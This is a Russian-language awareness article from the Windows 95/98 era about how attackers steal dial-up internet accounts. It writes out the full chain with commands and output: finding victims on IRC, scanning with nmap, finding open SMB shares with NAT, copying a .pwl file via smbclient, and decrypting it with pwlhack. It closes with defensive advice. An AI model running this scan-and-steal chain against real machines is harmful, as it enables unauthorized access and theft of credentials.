Аккаунт – имя пользователя и пароль, который используется для входа в “Internet”. Ни для кого не секрет, что сегодня все чаще хакеры, используя всяческие ухищрения, воруют в сетях бюджеты “чайников”. Пользователи, которым лень задуматься о безопасности, суждено расплачиваться по правилам, установленными беспредельщиками всемирной паутины. Вы платите деньги, а хаккер эти деньги использует, причем использует с выгодой для себя. На одном таком пользователе он выигрывает еще десять таких же. То, что он делает, сам он не может назвать воровством.

Наша цель – дать понять, как хакеры “вытаскивают” из под вашего носа ваши бюджеты. Тема пойдет о пользователях, которые установили себе операционную систему Windows95/98. Доверьтесь нашей статье, иначе вы окажитесь одним из тех, кого в виртуальном мире называют ламерами.

Итак, глубокая ночь, Вы решили побродить по просторам Всемирной Паутины. Вы запускаете свой “Dialer”, заполняете форму для соединения и нажимаете на “Connect”. Вы в Интернете. А тем временем….

Хаккеры используют довольно не сложный способ вытаскивания вашего бюджета. Все, что им нужно – терпение. Поверьте, эта черта хаккера есть у всех. Итак, с помощью сканера (nmap), программы nat, программы-клиента (smbclient), и программы взлома pwl-файлов - хаккер может проверить ваш компьютер на наличие открытых сетевых ресурсов, соединиться с ним и получить нужную ему информацию, которая находится у вас на жестком диске. Довольно тривиально, правда? Давайте рассмотрим действия хакера вплотную.

Итак, в качестве провайдера мы выберем выдуманный нами “www.junk.com”.

Довольно часто, жертву находят на каналах знаменитого IRC. Для начала взломщику надо узнать, находится ли пользователь, который пользуется услугами провайдера “JUNK”, на IRC. В строке “Status” он вводит команду:

/who *.junk.com

#RUSSIAN Andrey H andrey@dialup-28059.junk.com :0 hello.

*.junk.com End of /WHO list.

-

Мы видим слово “dialup” (удаленный доступ), которое находится возле “собачки”. Не долго думая, хаккер узнает его IP-адрес, который понадобится для поиска таких же пользователей, которые пользуются “удаленным доступом”:

/dns Andrey

-

*** Looking up dialup-28059.junk.com

*** Resolved dialup-28059. junk.com to 121.31.21.10

-

Итак, узнав IP-адрес пользователя, который пользуется услугами “удаленного доступа”, взломщик сканирует IP-адреса, которые в данный момент находятся в сети (в режиме “online”).

evil# nmap –o junk.result -P 121.31.21.*

Результат сканирования перенаправляется в файл junk.result:

--------

Starting nmap V. 1.49 by Fyodor (fyodor@dhp.com, www.dhp.com/~fyodor/nmap/)

Host dialup-28005.junk.com (121.31.21.5) appears to be up.

Host dialup-28009.junk.com (121.31.21.9) appears to be up.

Host dialup-28012.junk.com (121.31.21.12) appears to be up.

Host dialup-28021.junk.com (121.31.21.21) appears to be up.

Host dialup-28029.junk.com (121.31.21.29) appears to be up.

--------

Мы видим, что довольно просто узнать диапазон IP-адресов, которые могут быть подвержены взлому. Если учесть тот факт, что каждый второй пользователь использует операционную систему Windows95/98, можно с уверенностью сказать, что большинство компьютеров подвержены взлому.

Итак, после сканирования злоумышленник проверяет каждый IP-адрес (компьютер) на наличие открытых сетевых ресурсов (или иначе говоря – “shares”) с помощью программы проверки сети – “NAT”.

evil# nat 121.31.21.9

[*]--- Checking host: 121.31.21.9

[*]--- Obtaining list of remote NetBIOS names

[*]--- Remote systems name tables:

ANDREY

THEDOMAIN

ANDREY

[*]--- Attempting to connect with name: *

[*]--- Unable to connect

[*]--- Attempting to connect with name: ANDREY

[*]--- CONNECTED with name: ANDREY

[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03

[*]--- Server time is Wed May 6 16:05:50 1998

[*]--- Timezone is UTC+4.0

[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: YELTCIN

[*]--- CONNECTED with name: YELTCIN

[*]--- Attempting to establish session

[*]--- Obtained server information:

Server=[ANDREY] User=[] Workgroup=[THEDOMAIN] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment

--------------- ------ ------------

C Disk: Default share

IPC$ IPC: Remote IPC

[*]--- Attempting to access share: \ANDREY

[*]--- Unable to access

[*]--- Attempting to access share: \ANDREYC

[*]--- WARNING: Able to access share: \ANDREYC

[*]--- Checking write access in: \ANDREYC

[*]--- WARNING: Directory is writeable: \ANDREYC

[*]--- Attempting to exercise .. bug on: \ANDREYC

Итак, программа NAT показывает нам, что открыт доступ к сетевому ресурсу, а именно к диску “C:”.

“Able to access share: \ANDREYC”

Все очень просто. Теперь злоумышленник соединяется с вашим копьютером, чтобы затем добраться до интересующей его информации. Как правило, целью является ваш бюджет (в 99 случаях из ста). Соедениться с вашим компьютером позволяет программа smbclient (из пакета Samba).

evil# smbclient '\ANDREYC' -U ADMINISTRATOR -N -I 121.31.21.9

-N – без запроса пароля.

-U ADMINISTRATOR – имя, используемое при соединении.

Теперь, когда хакер находится в вашем комьютере, есть шанс, что он получит то, что искал – ваш бюджет, который вы используете для входа в Интернет. Ваш бюджет хранится в зашифрованном виде в файле с расширением pwl.

smb> ls *w

WINDOWS D

smb> cd windows

smb> ls *.pwl

andrey.pwl

smb> get andrey.pwl

Злоумышленник копирует файл, в котором находится ваш бюджет, после чего покидает ваш компьютер. Что он делает дальше? – спросите вы. Далее в дело вступает программа под названием pwlhack, которая расшифровывает содержимое бюджета.

C:HACKWIN95>pwlhack.exe /list andrey.pwl andrey

(C) 17-Apr-1998y by Hard Wisdom "PWL's Hacker" v3.0 (1996,97,98)

Enter the password:

File 'ANDREY.PWL' has size 1124 bytes, version NEW_Win95_OSR/2

for user 'ANDREY' with password '' contains:

-[Type]-[The resource location string]--------------[Password]-

Link OFFICED OFFICE veritas

Dial X *RnaСоединение JUNK Fd31Tta X4b9o93p

---------------------------------------------------------------

Indexed Entryes: 1; Number of resources: 2.

Fd31Tta – ваше регистрационное имя.

X4b9o93p – пароль.

Проделав столь несложную операцию, хаккер делает запись о вашем аккаунте. Как правило, добычу используют для доступа в Интернет за Ваш счет ;)

Поясню еще одну деталь:

Link - подключенный диск (удаленный сервер для контроля, принтер) в сети.

Dial - удаленные “дозвоны” с помощью модема.

Итак, Вы стали неуверенны в себе? У Вас появился повод для размышленя? Вот несколько советов, которые я могу вам дать

1. После заполнении формы (“Имя пользователя” и “пароль”) НЕ ставьте галочку в поле “Сохранить пароль”. По возможности наберайте ваше регистрационное имя и пароль при соединении. Для этого необходимо поставить галочку в “Выводить окно терминала после набора номера” (“Свойства”-“Настройка…” - “Параметры” – “Выводить окно терминала после набора номера”).

2. Поставьте пароль на свой компьютер. При установке Windows 95/98 под сеть, вам предлагают поставить пароль.

3. Необходимо отключить привязку “Служба доступа к файлам и принтерам” от “Контроллера удаленного пользователя”.

4. Переходите на UNIX, наконец!

Я вам рассказал только один из старых методов используемых хакерами в наши дни. Сейчас, чтобы не тратить свое время, хакеры придумали программы-скрипты, которым достаточно указать диапазон IP-адресов. Эти программы автоматически ищут предпологаемого пользователя, у которых открыт доступ к сетевым ресурсам. Задумайтесь о безопасности ваших данных. Может быть, хакера не заинтересует ваш бюджет…